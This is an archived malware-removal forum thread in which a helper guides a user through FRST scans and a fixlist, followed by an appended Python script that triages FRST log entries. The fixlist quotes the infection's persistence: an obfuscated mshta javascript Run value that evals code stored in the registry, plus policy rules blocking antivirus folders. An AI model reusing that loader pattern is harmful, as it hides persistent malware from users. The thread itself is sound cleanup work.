system
June 11, 2015, 2:14pm
1
I cannot seem to get rid of this virus! It seems to have disconnected me from the internet AND blocked my Avast!
When I open it, it prompts, “This program is blocked by group policy. Contact your system administrator for more information”.
When I try to change group permissions, access is denied.
What can I do?
Hi, let's have a quick look see
Please download Farbar Recovery Scan Tool and save it to your Desktop.
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
- Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
- Select additions at the bottom
- Press Scan button.
https://dl.dropboxusercontent.com/u/73555776/frst.JPG
- It will produce a log called FRST.txt in the same directory the tool is run from.
- Please attach both logs generated.
system
June 11, 2015, 2:41pm
3
Okay so it was too large to post so here is the Addition.txt
http://pastebin.com/MwEG4Aw4
And here is the FRST.txt
http://pastebin.com/BgqqczPn
Pondus
June 11, 2015, 2:42pm
4
Okay so it was too large to post
You don't post ... you attach ;)
Hi, you have a multitude of Panda drivers running. After the fix instructions I will give the uninstall link for Panda.
CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
HKLM-x32\...\Run: [**8c7ad3ee<*>] => mshta javascript:bIs5Hg8O="pSFclXDWpJ";D4N=new%20ActiveXObject("WScript.Shell");kd6gQIy="rt";u4GQi=D4N.RegRead("HKLM\\software\\Wow6432Node\\05296abf\\16adedb0");uymJFElt5="8W";eval(u4GQi);g5u8WhiJ="6 (the data entry has 3 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [**69fea1b4<*>] => "c:\users\kat\appdata\local\piqod\piqod.exe" <===== ATTENTION (Value Name with invalid characters)
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION
HKLM\...\Policies\Explorer\Run: [] =>
HKLM\...\Policies\Explorer\Run: [958791109] => C:\ProgramData\mssbuqxa.exe
HKU\S-1-5-21-2106257821-329901463-4097938246-1000\...\Policies\Explorer: [Run] "C:\Users\KAT\AppData\Roaming\Microsoft\Windows\IEUpdate\whoami.exe"
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-2106257821-329901463-4097938246-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{407a203c-c634-491c-a6e4-cbfecc9d558a} <======= ATTENTION (Policy restriction on IP)
Toolbar: HKU\S-1-5-21-2106257821-329901463-4097938246-1000 -> No Name - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - No File
FF Plugin-x32: @ogplanet.com/npOGPPlugin -> C:\Windows\system32\npOGPPlugin.dll No File
2015-06-10 13:07 - 2015-06-10 13:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\by.xatab
2015-06-10 12:48 - 2015-06-10 19:40 - 00000000 ____H C:\ProgramData\@system.temp
2015-06-07 18:54 - 2015-06-07 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\i-Funbox DevTeam
2015-06-07 18:54 - 2015-06-07 18:54 - 00000000 ____D C:\Program Files (x86)\i-Funbox DevTeam
Task: {B2164F79-DA12-4058-9999-106358D89330} - \odbcconf No Task File <==== ATTENTION
Task: {947A6C47-874B-4C8F-B186-7D78AB6BF1D6} - \whoami No Task File <==== ATTENTION
2015-06-04 12:15 - 2015-06-04 12:15 - 00000480 ____H C:\Users\KAT\AppData\Roaming\麽鎒駓覜
C:\ProgramData\mssbuqxa.exe
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
RemoveProxy:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe
https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG
Run FRST and press Fix
On completion a log will be generated; please post that.
THEN
Download the Panda uninstall tool from here and run
http://www.pandasecurity.com/resources/sop/UNINSTALLER.exe
NEXT could you run a fresh FRST scan to ensure that all of Panda has gone
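Added example, not part of the thread and not code from FRST or its authors: a small Python triage script that groups the kinds of entries seen in the fixlist above (software-restriction rules aimed at security products, Run values, and tasks with no task file). The regexes are inferred from the lines quoted in this thread, not from a documented FRST log format, and the sample is a constructed excerpt of those lines.

```python
import re
from collections import Counter

# Constructed sample: lines copied from the fixlist in this thread
# (the mshta value is shortened to "..." here).
SAMPLE = r"""
HKLM-x32\...\Run: [**8c7ad3ee<*>] => mshta javascript:... <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [**69fea1b4<*>] => "c:\users\kat\appdata\local\piqod\piqod.exe" <===== ATTENTION (Value Name with invalid characters)
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM\...\Policies\Explorer\Run: [958791109] => C:\ProgramData\mssbuqxa.exe
Task: {947A6C47-874B-4C8F-B186-7D78AB6BF1D6} - \whoami No Task File <==== ATTENTION
"""

SRP = re.compile(r"^\S+ Group Policy restriction on software: (.+?) <=+ ATTENTION")
RUN = re.compile(r"^(\S+?)\\\.\.\.\\(?:Policies\\Explorer\\)?Run: \[(.*?)\] => (.*?)(?: <=+ ATTENTION.*)?$")
TASK = re.compile(r"^Task: \{[0-9A-Fa-f-]+\} - (\S+) No Task File")

def run_reasons(line, command):
    """Why a Run entry deserves a closer look (heuristics, not verdicts)."""
    cmd, reasons = command.lower(), []
    if re.match(r'"?mshta(\.exe)?"?\s+javascript:', cmd):
        reasons.append("script run through mshta")
    if "\\appdata\\" in cmd or "\\programdata\\" in cmd:
        reasons.append("path under AppData/ProgramData")
    if "Value Name with invalid characters" in line:
        reasons.append("value name with invalid characters")
    return reasons

def triage(text):
    blocked, autoruns, tasks = Counter(), [], []
    for line in map(str.strip, text.splitlines()):
        if m := SRP.match(line):
            blocked[m.group(1)] += 1          # duplicates collapse into a count
        elif m := RUN.match(line):
            autoruns.append((m.group(2), m.group(3), run_reasons(line, m.group(3))))
        elif m := TASK.match(line):
            tasks.append(m.group(1))
    return {"blocked": blocked, "autoruns": autoruns, "orphan_tasks": tasks}

if __name__ == "__main__":
    report = triage(SAMPLE)
    for path, n in report["blocked"].items():
        print(f"policy blocks {path} ({n} rule(s))")
    for name, cmd, why in report["autoruns"]:
        print(f"Run [{name}] -> {cmd}: {', '.join(why) or 'no flag'}")
    print("tasks without a task file:", report["orphan_tasks"])
```

Collapsing the repeated restriction lines into per-path counts makes it easy to see which security products the policy rules target before and after the fix is applied.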